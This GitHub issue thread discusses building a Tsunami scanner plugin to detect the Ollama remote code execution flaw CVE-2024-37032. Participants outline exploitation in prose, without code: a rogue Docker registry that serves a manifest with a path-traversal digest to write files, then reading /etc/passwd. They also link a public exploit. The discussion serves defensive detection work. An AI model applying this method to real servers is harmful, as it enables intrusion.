Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

AI PRP: Ollama Remote Code Execution Vulnerability #511

Open
grandsilva opened this issue Jun 24, 2024 · 16 comments
Open

AI PRP: Ollama Remote Code Execution Vulnerability #511

grandsilva opened this issue Jun 24, 2024 · 16 comments
Assignees
Labels
ai-bounty-prp Identify an AI bounty plugin Contributor main The main issue a contributor is working on (top of the contribution queue).

Comments

@grandsilva
Copy link

According to this research:

Ollama’s HTTP server exposes multiple API endpoints that perform various actions.

This RCE needs to use an arbitrary file write to gain RCE. I'm not sure if this is the preferred method for writing tsunami plugins.

If you're interested in developing a tsunami plugin to detect exposed Ollama HTTP servers, I'll proceed with further research on this case.
(however, I think it is one of the most popular open-source GitHub repositories currently, maybe the most popular)

links:
https://github.com/ollama/ollama
https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032

@tooryx
Copy link
Member

tooryx commented Jun 24, 2024

Hi @grandsilva,

Could you start by writing a fingerprint for ollama to start?
If so, could you please create a new issue and I will approve it.

~tooryx

@grandsilva
Copy link
Author

Hi @tooryx
I'm not sure about the fingerprint as this is an API I guess, Also I'm not interested in writing fingerprints, could you create a PRP for fingerprint so someone else who is interested in writing fingerprints accepts the request?

@tooryx
Copy link
Member

tooryx commented Jun 24, 2024

Thanks @grandsilva. Anyone that is interested in writing that fingerprint can then create the issue and I will accept it. Feel free to suggest other plugins in the meantime.

~tooryx

@maoning
Copy link
Collaborator

maoning commented Jun 27, 2024

@grandsilva Could you start the vuln research, and focus on these 2 areas:

  1. For RCE, what could be an easy way to verify if via arbitrary file write through Tsunami. We may not want to do it all the time, because we don't want Tsunami to do state changing actions. However it is easy to support, we could make it an optional config for users to toggle.
  2. Does the presence of arbitrary file read always indicates the existence of arbitrary file write? If it is the case, we could publish the vulnerability if we can read /etc/passwd file for example.

Please provide timely response, I will monitor this thread. Thanks!

@maoning maoning added ai-bounty-prp Identify an AI bounty plugin PRP:Accepted labels Jun 27, 2024
@grandsilva
Copy link
Author

@maoning we need to host a docker image, hosing the image is possible with the GitHub container registry.
but still, we have a problem here, the hosting should be dynamic because it should contain the callback server address.
about the arbitrary file, it is not reflective and we must be able to get the body of requests to our docker registry to read and exploit this vulnerability.

Another option is hosting a docker image with a web server with 4 or 5 endpoints( with Docker Image Manifest V2)

Although, We can send arbitrary get requests to check the exposed API server, but it is unlikely to validate arbitrary file write and file read CVEs with SSRF.

@maoning
Copy link
Collaborator

maoning commented Jul 3, 2024

@grandsilva could you elaborate more on how the docker image interacts with the target Ollama service?

@grandsilva
Copy link
Author

OK sorry about the bad explanation.

An API endpoint for the Ollama web server allows for arbitrary docker image pull, arbitrary means from an arbitrary server.
The server should be an HTTP server with some endpoint to comply with the Docker Image Manifest V2 specification, it basically means that some HTTP endpoint must exist on this docker image registry server to comply with docker pull ourServer/image:tag

We need to control this docker image registry HTTP server because we need to send our payload when we as the Ollama web server pull our docker images(as an exploit payload)
so we must have a custom http server.

A researcher already wrote the http server: https://github.com/Bi0x/CVE-2024-37032

we can request an arbitrary URL to pull the docker images, therefore we can send a get request to the tsunami callback server.

@tooryx
Copy link
Member

tooryx commented Jul 8, 2024

Hey @grandsilva,

Could you take a look with using images such as curl or bash to try to communicate with the callback server? Would that work? Would any image or deployment be left after exploitation on the target?

Cheers,
~tooryx

@tooryx
Copy link
Member

tooryx commented Jul 16, 2024

Hi @grandsilva,

What are your thouhgts on this?

~tooryx

@grandsilva
Copy link
Author

@tooryx I need more time because I need to do more research, could you let me work on this PR instead? I want to write a plugin, but it's been over a month since I waited to accept my first PRP. I think you are OK with a RCE in geoserver.

@tooryx
Copy link
Member

tooryx commented Jul 17, 2024

Hi @grandsilva, I will discuss this with the rest of the team, but we are a lot less interested by GeoServer as far as I know.

~tooryx

@tooryx
Copy link
Member

tooryx commented Jul 17, 2024

Hi @grandsilva,

In that case, I will release this one to be grabbed by other contributors.

~tooryx

@tooryx tooryx added help wanted Extra attention is needed and removed PRP:Accepted labels Jul 17, 2024
@OccamsXor
Copy link
Contributor

Hi @tooryx @maoning,

I'd like to help with this issue. Can you assign it to me?

@tooryx
Copy link
Member

tooryx commented Jul 31, 2024

Hi @OccamsXor, you can work on this.

~tooryx

@tooryx tooryx added the Contributor main The main issue a contributor is working on (top of the contribution queue). label Jul 31, 2024
@OccamsXor
Copy link
Contributor

Hi @tooryx @maoning,

I checked a couple of vulnerability analysis posts for CVE-2024-37032 and it seems that exploitation of the vulnerability requires a web server which would behave as a private registry and supply a malicious manifest file, that contains a path traversal payload in the digest field, to the vulnerable system.

@grandsilva also mentioned the same issue here: #511 (comment)

My question is this: Does Tsunami have the functionality that would allow us to start a custom web server during scanning? This web server should be able to serve responses which are determined by the plugin.

Ref: https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032

@tooryx
Copy link
Member

tooryx commented Aug 6, 2024

Hi @OccamsXor,

No, currently Tsunami does not have such capability. I will chat with the rest of the team to see if we can find a solution for this.

~tooryx

@tooryx tooryx removed the help wanted Extra attention is needed label Aug 16, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
ai-bounty-prp Identify an AI bounty plugin Contributor main The main issue a contributor is working on (top of the contribution queue).
Projects
None yet
Development

No branches or pull requests

4 participants